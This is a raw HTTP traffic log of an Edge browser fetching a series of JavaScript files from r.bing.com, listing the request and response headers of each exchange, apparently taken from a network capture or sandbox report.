content-md5: yaTET5I1fmUKhVemn0wu5w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 692a9535-601e-0067-1a7a-1e5937000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=92282
expires: Fri, 31 Jan 2025 23:41:50 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e74b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/9Z2GyyGvsKSVNrmOMrTfcv8z_yQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD2EDFDDA09D23
content-type: text/javascript; charset=utf-8
content-md5: bglrfusHszJbBVCKCoDnQg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e7be383d-c01e-0025-2a5b-617223000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 6994
cache-control: public, no-transform, max-age=79368
expires: Fri, 31 Jan 2025 20:06:36 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e74c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5FD53B2D55
content-length: 140
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: zk7Mu+IZ+1Afv84KFZt8XQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e49a919d-b01e-0021-56c5-1787a1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=423684
expires: Tue, 04 Feb 2025 19:45:12 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e74d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/dUzSc2TJEdHviToK914Fg1aekPA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C30A28A766
content-type: text/javascript; charset=utf-8
content-md5: MkbY3tM5BoIJgMyWXEttiw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e43fa0c9-a01e-003e-7916-375cb1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1727
vary: Accept-Encoding
cache-control: public, no-transform, max-age=99495
expires: Sat, 01 Feb 2025 01:42:03 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e74e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/8LIV7VPMYjV_ya4Ggnu8LBWQIQQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5D351B0B64
content-length: 626
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 6Xn7G4GYLjqWVjZYfi42LQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 942ab205-401e-0070-59f5-179954000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=333230
expires: Mon, 03 Feb 2025 18:37:38 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e74f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/JTnIefOMiNK7DX11D7RY8i0_PKc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC633D5EAA6A
akamai-grn: 0.40367a5c.1737390770.26d28f07
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 282
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ZsrYRIS4X28M0gd5bb2Heg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dedc9b5b-b01e-0065-5986-185bcd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=100185
expires: Sat, 01 Feb 2025 01:53:33 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e751
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/_Bf8WbhrPNleVJdfG-L0A8nld9c.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5F9B563C48
content-type: text/javascript; charset=utf-8
content-md5: 10AmaEgXjFITcl8HP2hwyQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d7ecb45b-501e-0064-120b-1b5a30000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 194
cache-control: public, no-transform, max-age=156773
expires: Sat, 01 Feb 2025 17:36:41 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e750
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC608BA54CA4
akamai-grn: 0.60ba1302.1738223225.191813d6
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 462
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: fr82fvtvcsicFIwsSPlj7g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8defdcf7-101e-004a-72ef-15daf7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=48000
expires: Fri, 31 Jan 2025 11:23:48 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e752
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rs/6r/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: gzip
last-modified: Mon, 23 Sep 2024 23:41:33 GMT
x-eventid: 6791bac43724417cb51fc8092c9c6e7c
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E01C
x-as-suppresssetcookie: 1
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-N2iAHvoruEyoTn7G/7W7N6zFhBFOYdble7/ukiXJZQk='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
cache-control: public, max-age=79523
expires: Fri, 31 Jan 2025 20:09:11 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e753
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC6494C9BF9A
content-type: text/javascript; charset=utf-8
content-md5: +jWBJey2nJqR+pG7G7E28A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7fcf8c82-301e-003b-4d01-17a8ce000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 197
cache-control: public, no-transform, max-age=131715
expires: Sat, 01 Feb 2025 10:39:03 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e754
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC66034C9278
akamai-grn: 0.2f367a5c.1734429734.4f373a8
content-type: text/javascript; charset=utf-8
content-md5: Tm502hkAmxWuxzxBM7uX9A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 781b7082-c01e-0061-7803-1bae4f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 584
cache-control: public, no-transform, max-age=237856
expires: Sun, 02 Feb 2025 16:08:04 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e755
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5CE09E00D2
content-length: 375
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: kdgVpI0X+oWcnOv0ZCUuIA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 40b94707-101e-0027-33eb-1470d9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=169960
expires: Sat, 01 Feb 2025 21:16:28 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e756
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC6535F306CD
content-type: text/javascript; charset=utf-8
content-md5: 3vstlq/a5ZcE98e8La1vPw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2e858b78-d01e-0013-441f-18df71000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 511
cache-control: public, no-transform, max-age=281082
expires: Mon, 03 Feb 2025 04:08:30 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e757
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC62149C3678
content-length: 386
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 6W4GJTTFhKoLN+eXDWPo3Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2f7b32df-801e-006d-2071-1540be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=317112
expires: Mon, 03 Feb 2025 14:09:00 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e759
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/TA5w4JZB_Bofmi4E2NA9kDEyusQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC61BC3A6D83
content-length: 218
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Nxjfu3FuQxhf33rq+sYskQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: df21f994-101e-002c-796b-1568ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=327804
expires: Mon, 03 Feb 2025 17:07:12 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e75a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC68DCA5DDA0
akamai-grn: 0.b5777b5c.1736749620.1a912e20
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 446
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: wMjND6gwy3LKsXBo8Ww74w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 87927048-e01e-001b-63cf-15c402000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=303306
expires: Mon, 03 Feb 2025 10:18:54 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e75b
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/DWZSY9SRnkHaYWjJ109REMim90A.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C2817D87DF
akamai-grn: 0.60ba1302.1738136535.5a96f0ad
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: 63v18faN7ozJ98XstK/S+w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: abb7f9ac-b01e-0065-30fe-1a5bcd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 11731
vary: Accept-Encoding
cache-control: public, no-transform, max-age=39166
expires: Fri, 31 Jan 2025 08:56:34 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e75d
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/9uYIRoQB-ThMq970XKGeKvrMhL0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C26ED294B5
akamai-grn: 0.4d367a5c.1737453383.1db3580f
content-length: 65123
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ImVBVQpRkRw3Uhb3GEk/ZQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5ecfd2e8-701e-0015-5bde-1a2809000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=184756
expires: Sun, 02 Feb 2025 01:23:04 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e761
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
